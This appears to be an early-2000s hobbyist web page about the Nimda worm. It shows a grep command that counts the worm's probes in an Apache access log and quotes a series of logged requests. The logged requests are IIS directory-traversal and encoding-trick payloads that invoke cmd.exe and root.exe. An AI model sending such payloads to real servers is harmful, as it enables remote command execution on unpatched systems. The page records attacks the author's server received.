CodeRed

The New and Improved Code Red ... NIMDA

This webserver has been attacked by Nimda Times

The number is the out-put of:

grep -c "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir" /usr/local/apache/logs/access_log

The attack string is received as a web server request, thusly:

xx.xx.xx.xx- - [18/Sep/2001:23:00:45 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:45 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 455 "-" "-"xx.xx.xx.xx- - [18/Sep/2001:23:00:46 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:46 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:47 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:47 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:48 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:48 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:49 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:49 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:50 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:50 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:50 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:51 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:51 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"
xx.xx.xx.xx- - [18/Sep/2001:23:00:52 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 455 "-" "-"

With the xx.xx.xx.xx being the address of the poor winloser. As this opens a bunch of remote holes I've substituted xxs for his protection

Micrsoft Free

This machine Microsoft Free